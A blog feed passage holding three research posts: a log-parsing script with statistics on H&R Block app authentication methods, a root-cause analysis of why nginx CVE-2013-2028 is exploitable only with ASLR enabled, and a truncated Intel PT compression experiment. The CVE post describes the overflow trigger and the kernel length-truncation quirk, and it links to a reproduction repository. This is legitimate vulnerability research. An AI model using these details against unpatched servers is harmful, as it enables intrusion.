<span class="k">if</span> <span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;v&#39;</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">][</span><span class="mi">1</span><span class="p">:]</span>
<span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="o">==</span> <span class="mi">6</span>
<span class="k">return</span> <span class="n">res</span>
<span class="k">def</span> <span class="nf">is_hrb</span><span class="p">(</span><span class="n">year</span><span class="p">,</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">):</span>
<span class="sd">&quot;&quot;&quot; Validate that a line should be parsed and added to the buckets.</span>
<span class="sd"> Specifically, entry should contain the right year, be a HRB user-agent,</span>
<span class="sd"> and contain the filter keyword if one was provided.</span>
<span class="sd"> &quot;&quot;&quot;</span>
<span class="k">if</span> <span class="n">line</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="n">year</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">False</span>
<span class="k">if</span> <span class="n">line</span><span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">14</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;HRB&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">False</span>
<span class="k">if</span> <span class="ow">not</span> <span class="nb">filter</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">and</span> <span class="ow">not</span> <span class="nb">filter</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">False</span>
<span class="k">return</span> <span class="bp">True</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">&#39;__main__&#39;</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;Usage:&#39;</span><span class="p">,</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s1">&#39;&lt;tax-year&gt;&#39;</span><span class="p">,</span> <span class="s1">&#39;&lt;filter&gt;&#39;</span><span class="p">,</span> <span class="s1">&#39;&lt;filepath&gt;&#39;</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="nb">filter</span> <span class="o">=</span> <span class="bp">None</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">filter</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="s1">&#39;r&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">ifile</span><span class="p">:</span>
<span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="n">line</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">ifile</span> <span class="k">if</span> <span class="n">is_hrb</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">)]</span>
<span class="n">buckets</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">&#39;OS&#39;</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">&#39;IOS&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">&#39;ANDROID&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">&#39;DEVICE&#39;</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">&#39;PHONE&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">&#39;TABLET&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">&#39;APP&#39;</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">&#39;MYBLOCK&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">&#39;AUTH&#39;</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">&#39;TOUCHID&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">&#39;FACEID&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">&#39;N/A&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">&#39;VERSION&#39;</span><span class="p">:</span> <span class="p">{},</span>
<span class="s1">&#39;BROWSER&#39;</span><span class="p">:</span> <span class="p">{},</span>
<span class="p">}</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
<span class="n">tokens</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">&#39;,&#39;</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;WARNING: Cannot tokenize:&#39;</span><span class="p">,</span> <span class="n">line</span>
<span class="k">continue</span>
<span class="n">subtokens</span> <span class="o">=</span> <span class="n">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">&#39;-&#39;</span><span class="p">))</span>
<span class="k">if</span> <span class="n">subtokens</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;WARNING: Cannot subtokenize:&#39;</span><span class="p">,</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">&#39;-&#39;</span><span class="p">)</span>
<span class="k">continue</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">count</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
<span class="k">except</span> <span class="ne">ValueError</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;WARNING: Could not parse count from:&#39;</span><span class="p">,</span> <span class="n">line</span>
<span class="k">continue</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;OS&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;OS&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;DEVICE&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;DEVICE&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;APP&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;APP&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
<span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
<span class="k">print</span> <span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">buckets</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">4</span><span class="p">)</span>
</pre></div>
<h2>Results</h2>
<p>So here's what I uncovered, listed in no particular order:</p>
<ul>
<li>From January 7 through February 8, <strong>232,248</strong> requests were made by MyBlock
apps.</li>
<li><strong>230,226</strong> requests were made from phones while <strong>2,022</strong> were tablets; over
<strong>99%</strong> of the requests were phones.</li>
<li><strong>0</strong> requests were made by Android tablets.</li>
<li>Over <strong>99%</strong> of requests were made by devices running iOS.</li>
<li>Two versions of the app appear in the dataset: <strong>6.0.0</strong> and <strong>6.1.0</strong>.</li>
<li>Version 6.1.0 makes up over <strong>99%</strong> of the requests.</li>
<li>The first requests made by version 6.1.0 occurred on January 13; <strong>6</strong> days
after the first 6.0.0 request.</li>
<li><strong>100%</strong> of requests from Android devices were version 6.1.0.</li>
<li>The requests made from Android devices contain no information about
authentication method or browser.</li>
<li><strong>100%</strong> of requests from iOS contain "Mozilla" in the user-agent.</li>
</ul>
<p>And finally, the observations relevant to my question:</p>
<ul>
<li><strong>170,816</strong> requests used TouchID, <strong>15,323</strong> FaceID,
and <strong>45,867</strong> showed neither keyword;
<strong>74%</strong>, <strong>7%</strong>, and <strong>19%</strong>, respectively.</li>
<li><strong>0%</strong> of requests for version 6.0.0 on iOS used FaceID.</li>
</ul>
<h2>Discussion</h2>
<p>For the requests from iOS devices that didn't mention an authentication method
in their user-agent, I assume the user typed in a password or pin, though I
haven't confirmed this. I also haven't looked into why all the iOS requests have
"Mozilla" at the end of their user-agent. It's probably related to the browser
framework used by the MyBlock app.</p>
<p>Judging by the fact that no requests from version 6.0.0 of the app used FaceID,
it's possible that this feature wasn't implemented until 6.1.0, though this is
just speculation.</p>
<p>Most interestingly, users appear to be comfortable with using Apple's TouchID
to protect their MyBlock. Even more interesting is that people are comfortable
with using FaceID, considering that this feature is relatively new. It appears
that in mobile computing, biometric authentication is a widely accepted trend.</p>
<p>It's also worth mentioning that while MyBlock doesn't appear to have been available during
the 2017 tax season, another H&amp;R Block app does appear:</p>
<div class="highlight"><pre><span></span>HRB-MOBILE-IOS-PHONE-TAXES-6.4-Mozilla
</pre></div>
<p>This app seems to have two version: 6.4 and 6.3, but the total number of
requests is very low; only a few thousand. Another interesting finding is
<strong>13</strong> requests made on April 26, 2017 with this user-agent:</p>
<div class="highlight"><pre><span></span>HRB-MOBILE-IOS-PHONE-TAXES-nil-Mozilla
</pre></div>
<p>Perhaps this was a test version of the app?</p>
<h2>Future Work</h2>
<p>We still have 2 months to go in this year's tax season, so I'll be interested
to check the numbers once the season closes. I'm also interested to see how
many people continue to use this app outside of the tax season and how these
results will change in 2019.</p>How ASLR Helps Enable Exploits (CVE-2013-2028)2017-12-16T11:30:00-05:002017-12-16T11:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-12-16:/aslr-enables-exploit.html<p>The other day I was playing around with <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2028">CVE-2013-2028</a>
along with my peer <a href="https://www.cc.gatech.edu/~hhu86/">Hong Hu</a> when we came across
something odd: <em>CVE-2013-2028 is only exploitable on 64-bit GNU/Linux when ASLR is <strong>enabled</strong></em>.
After confirming this observation multiple times, we were left very surprised.
How could ASLR possibly <em>worsen</em> the …</p><p>The other day I was playing around with <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2028">CVE-2013-2028</a>
along with my peer <a href="https://www.cc.gatech.edu/~hhu86/">Hong Hu</a> when we came across
something odd: <em>CVE-2013-2028 is only exploitable on 64-bit GNU/Linux when ASLR is <strong>enabled</strong></em>.
After confirming this observation multiple times, we were left very surprised.
How could ASLR possibly <em>worsen</em> the security of an application? Driven by
curiosity, we decided to find the root cause of this result. Ultimately, we
had to go all the way to the Linux kernel code to find our answer. What we
found was a kernel quirk that can't really be called a bug from the kernel's
perspective, but does go against the expectations of the user.
So without further ado, allow
me to share how ASLR can enable the exploitation of applications.</p>
<p>For those unfamiliar with CVE-2013-2028, all that needs to be known is it's an
exploitable vulnerability in older versions of nginx stemming from a stack
buffer overflow that can be triggered by specially crafted HTTP requests.
The bug occurs because an integer provided to nginx by the user that is intended
to be an unsigned value is accidentally casted temporarily into a signed value.
If an attacker passes a sufficiently large value, the worker thread handling the
request will copy too much data from its network socket into a fixed sized buffer
causing the stack to get smashed.
For the curious reader, a more in-depth analysis is available
<a href="https://www.vnsecurity.net/research/2013/05/21/analysis-of-nginx-cve-2013-2028.html">here</a>
and a repository for reproducing it is available
<a href="https://github.com/kitctf/nginxpwn">here</a>.</p>
<p>So why is this bug only exploitable when ASLR is turned on? We can find the
user space answer with a simple <code>strace</code>. If we make a chunked HTTP request and
claim the total size is going to be <code>0xaaaaaaaaaaaaaaaa</code>, nginx's worker will
make a <code>recvfrom()</code> system call for <code>0xaaaaaaaaaaaaaab0</code> bytes from the network
socket. When ASLR is turned on, the Linux kernel will copy our request (which is
not actually <code>0xaaaaaaaaaaaaaaaa</code> bytes long) into the worker's buffer, smashing
the stack. However, when ASLR is turned off, the kernel will return <code>-EFAULT</code> and
the worker will safely report the error and close the session.</p>
<p>We could stop here, but Hong and I were not satisfied. Why is the kernel returning
<code>-EFAULT</code> when ASLR is disabled but not when it is enabled? The space allocated for
the stack is the same in both cases, so that can't be the problem. The only obvious
difference is ASLR moves the stack's address range to randomize it. When ASLR
is disabled, the stack's highest address is placed at the boundary between user and
kernel space, which is <code>0x7fffffffffff</code> in Linux kernels compiled for <code>x86_64</code>. However,
<code>0xaaaaaaaaaaaaaab0</code> is such a large number it shouldn't matter where the stack is
placed. It's not going to fit into the memory segment and it's going to cross the
boundary. So what's really happening in the kernel when it handles a <code>recvfrom()</code>
system call?</p>
<p>Taking a look at Linux's
<a href="http://elixir.free-electrons.com/linux/v4.9-rc4/source/net/socket.c#L1665">implementation</a>
of <code>recvfrom()</code>, we see the following code:</p>
<div class="highlight"><pre><span></span><span class="n">SYSCALL_DEFINE6</span><span class="p">(</span><span class="n">recvfrom</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">ubuf</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span>
<span class="kt">unsigned</span> <span class="kt">int</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span>
<span class="kt">int</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">addr_len</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">socket</span> <span class="o">*</span><span class="n">sock</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">iovec</span> <span class="n">iov</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">msghdr</span> <span class="n">msg</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sockaddr_storage</span> <span class="n">address</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">err</span><span class="p">,</span> <span class="n">err2</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">fput_needed</span><span class="p">;</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">import_single_range</span><span class="p">(</span><span class="n">READ</span><span class="p">,</span> <span class="n">ubuf</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">iov</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">msg_iter</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">err</span><span class="p">))</span>
<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">sockfd_lookup_light</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">err</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">fput_needed</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">sock</span><span class="p">)</span>
<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_control</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_controllen</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="cm">/* Save some cycles and don&#39;t copy the address if not needed */</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_name</span> <span class="o">=</span> <span class="n">addr</span> <span class="o">?</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="nl">address</span> <span class="p">:</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="cm">/* We assume all kernel code knows the size of sockaddr_storage */</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_iocb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">sock</span><span class="o">-&gt;</span><span class="n">file</span><span class="o">-&gt;</span><span class="n">f_flags</span> <span class="o">&amp;</span> <span class="n">O_NONBLOCK</span><span class="p">)</span>
<span class="n">flags</span> <span class="o">|=</span> <span class="n">MSG_DONTWAIT</span><span class="p">;</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">sock_recvmsg</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">addr</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
<span class="n">err2</span> <span class="o">=</span> <span class="n">move_addr_to_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">address</span><span class="p">,</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">addr_len</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">err2</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">err2</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">fput_light</span><span class="p">(</span><span class="n">sock</span><span class="o">-&gt;</span><span class="n">file</span><span class="p">,</span> <span class="n">fput_needed</span><span class="p">);</span>
<span class="nl">out</span><span class="p">:</span>
<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
<p>This code performs two relevant checks. The first occurs in:</p>
<div class="highlight"><pre><span></span><span class="n">err</span> <span class="o">=</span> <span class="n">import_single_range</span><span class="p">(</span><span class="n">READ</span><span class="p">,</span> <span class="n">ubuf</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">iov</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">msg_iter</span><span class="p">);</span>
</pre></div>
<p>And the second occurs in:</p>
<div class="highlight"><pre><span></span><span class="n">err2</span> <span class="o">=</span> <span class="n">move_addr_to_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">address</span><span class="p">,</span> <span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">addr_len</span><span class="p">);</span>
</pre></div>
<p>However, we can rule out <code>move_addr_to_user()</code> because it's passed
the number of bytes <em>actually</em> fetched from the socket, which is the same in
our attack regardless of ASLR. This leaves <code>import_single_range()</code>, which is
<a href="http://elixir.free-electrons.com/linux/v4.9-rc4/source/lib/iov_iter.c#L1207">implemented</a>
as follows:</p>
<div class="highlight"><pre><span></span><span class="kt">int</span> <span class="nf">import_single_range</span><span class="p">(</span><span class="kt">int</span> <span class="n">rw</span><span class="p">,</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">iovec</span> <span class="o">*</span><span class="n">iov</span><span class="p">,</span> <span class="k">struct</span> <span class="n">iov_iter</span> <span class="o">*</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&gt;</span> <span class="n">MAX_RW_COUNT</span><span class="p">)</span>
<span class="n">len</span> <span class="o">=</span> <span class="n">MAX_RW_COUNT</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">access_ok</span><span class="p">(</span><span class="o">!</span><span class="n">rw</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">len</span><span class="p">)))</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
<span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_base</span> <span class="o">=</span> <span class="n">buf</span><span class="p">;</span>
<span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_len</span> <span class="o">=</span> <span class="n">len</span><span class="p">;</span>
<span class="n">iov_iter_init</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">rw</span><span class="p">,</span> <span class="n">iov</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">EXPORT_SYMBOL</span><span class="p">(</span><span class="n">import_single_range</span><span class="p">);</span>
</pre></div>
<p>In this function, a sanity check is performed via <code>access_ok()</code> to make sure
the number of bytes requested by the caller cannot cause a write that would
cross into kernel space. But as we pointed out before, the value nginx's worker
is passing here is <code>0xaaaaaaaaaaaaaab0</code>, which should easily cross the boundary
regardless of ASLR. The type <code>size_t</code> is defined as an unsigned 64-bit integer
in our case, so <code>access_ok()</code> should be passed <code>0xaaaaaaaaaaaaaab0</code>, right?
Actually, if we look more closely, we can see the following lines enforce a
limit on <code>len</code>:</p>
<div class="highlight"><pre><span></span><span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&gt;</span> <span class="n">MAX_RW_COUNT</span><span class="p">)</span>
<span class="n">len</span> <span class="o">=</span> <span class="n">MAX_RW_COUNT</span><span class="p">;</span>
</pre></div>
<p>If we lookup <code>MAX_RW_COUNT</code>, we can see it equals <code>(INT_MAX &amp; PAGE_MASK)</code>,
which turns out to be a 32-bit value. So in other words, even though <code>recvfrom()</code>
allows 64-bit unsigned integer lengths on <code>x86_64</code>, <code>import_single_range()</code> truncates
them into 32-bit unsigned integers! On a 64-bit processor, this truncation
combined with ASLR's relocation of the stack allows our attack to pass the
<code>access_ok()</code> check and smash nginx's stack.</p>
<p>Technically, this isn't a bug from the
kernel's perspective because <code>import_single_range()</code> also calls <code>iov_iter_init()</code>
with the truncated length. This means <code>recvfrom()</code> can only receive up to the truncated
length worth of bytes from the socket and therefore passing the truncated value to
<code>access_ok()</code> is safe.</p>
<p>That said, it's a really odd way of implementing this system call. From the caller's
perspective, it's not made clear that even though it can pass a 64-bit length, only
the lower 32-bits will be considered. Also <code>recvfrom()</code> treats the length as 64-bits
all the way through its logic, so it's not immediately obvious that the length is
being truncated by <code>MAX_RW_COUNT</code>. Additionally, as Hong and I discovered, there
is a security consequence to this choice. Performing the <code>access_ok()</code> check on
the truncated length allows network attacks that rely on integer overflow and
underflow to succeed where they would otherwise more likely be blocked by the kernel
due to a failed system call. We find this to be an interesting consequence since
it results from seemingly unrelated design decisions. It is hard to recommend that
the Linux kernel developers revise <code>import_single_range()</code> given that the real
problem is a bug in nginx and not the Linux kernel itself, but we find this
discovery fascinating regardless.</p>Intel PT Data at Rest: A Compression Experiment2017-10-28T10:30:00-04:002017-10-28T10:30:00-04:00Carter Yagemanntag:carteryagemann.com,2017-10-28:/pt-data-at-rest.html<p><em>Full Disclosure: I am a researcher in Georgia Tech's
<a href="http://istc-arsa.iisp.gatech.edu">ISTC-ARSA</a>, which is funded by
Intel. Although I reference two publications that share Xinyang Ge and Weidong Cui as
authors, I am neither associated with them nor Microsoft Research at the time
of writing.</em></p>
<p>Intel Processor Trace (PT) is a powerful …</p><p><em>Full Disclosure: I am a researcher in Georgia Tech's
<a href="http://istc-arsa.iisp.gatech.edu">ISTC-ARSA</a>, which is funded by
Intel. Although I reference two publications that share Xinyang Ge and Weidong Cui as
authors, I am neither associated with them nor Microsoft Research at the time
of writing.</em></p>
<p>Intel Processor Trace (PT) is a powerful hardware feature for recording the
behavior of CPUs. With it, developers and researchers can monitor the
control-flow path taken by threads, hardware interrupts, and more, all with
cycle-accurate timing. However, this rich stream of data comes at the cost of
size. Depending on what PT is configured to trace, it can output <em>hundreds of
megabytes</em> of data <em>per second per core</em>. PT does take steps to save bandwidth by
only recording changes in control-flow, excluding redundant high-order bits
in target addresses, and compressing returns leading to predictable locations. However,
despite this compression, the volume of data is still massive.</p>
<p>As a consequence, much of the work
published so far handles tracing in one of two ways. One option is to consume the
trace as it is generated. This works as long as the consumer can keep up with the
producer, which is the case in the control-flow integrity (CFI) system
<a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Griffin</a>.
The other common approach is to configure PT to write in a circular
buffer. This option is suitable for crash dump analysis systems like
<a href="https://dl.acm.org/authorize?N47279">Snorlax</a>, which only need a fixed size
window into a thread's past.</p>
<p>However, while some applications are feasible using the two previous methods,
there are still situations were it is desirable to store the entire trace for
postmortem analysis. If nothing else, it is useful for repeatable experiments.
With this in mind, I performed a naive experiment last night to explore if
more can be done to compress PT traces when <em>the data is at rest</em>. Based on the
observations that the compression PT applies is highly localized (i.e. a target
address verses the previously recorded target address and a return verses the
previously recorded call) and that programs often execute repetitive loops,
I hypothesized that even a general purpose compression algorithm should
be able to compress traces with a good ratio.</p>
<h2>Procedure</h2>
<p>The overall idea for the experiment is very simple: gather some PT traces,
compress them with a commonly used algorithm, and compare the sizes.
For a subject I used the simple HTTP server that comes with Python 2.7 to host
a copy of this blog. For each trial I had a crawler request pages from the
server for a set duration. Once the time expired, I terminated the server and
crawler and stopped the tracing. I then compressed the trace using the GNU/Linux
utility <code>gzip</code>, which uses Lempel-Ziv coding. I also fed it through a
disassembler that matches the PT packets to the binary's static code to
produce a linear sequence of instructions. From this I counted the number of
unique basic blocks executed during the trace to serve as a rough proxy for code
coverage. To summarize the procedure:</p>
<ol>
<li>
<p>Configure and enable PT tracing.</p>
</li>
<li>
<p>Start the Python HTTP server.</p>
</li>
<li>
<p>Start the crawler.</p>
</li>
<li>
<p>Wait for a specified duration.</p>
</li>
<li>
<p>Terminate the crawler and server.</p>
</li>
<li>
<p>Stop PT tracing.</p>
</li>
<li>
<p>Compress the resulting trace and count the number of unique basic blocks executed.</p>
</li>
</ol>
<h2>Results</h2>
<p><center>
<img alt="Figure 1" src="https://carteryagemann.com/images/pt-at-rest-fig1.png">
</center></p>
<p>Comparing the original size of the PT trace to the size after compression
produces the above graph. Both plots best match linear regressions and are
increasing over time. However, the size of the compressed traces increases
at a slower rate than the uncompressed traces, meaning these two plots are
diverging as time increases.</p>
<p>Another observation to note is the large volume of
trace data produced during the server's startup.
This explains why even the shortest trial produced a 1GB trace.
For the same reason, counting the number
of unique basic blocks turned out to not be useful. The number of new basic
blocks executed while serving requests was small.</p>
<p><center>
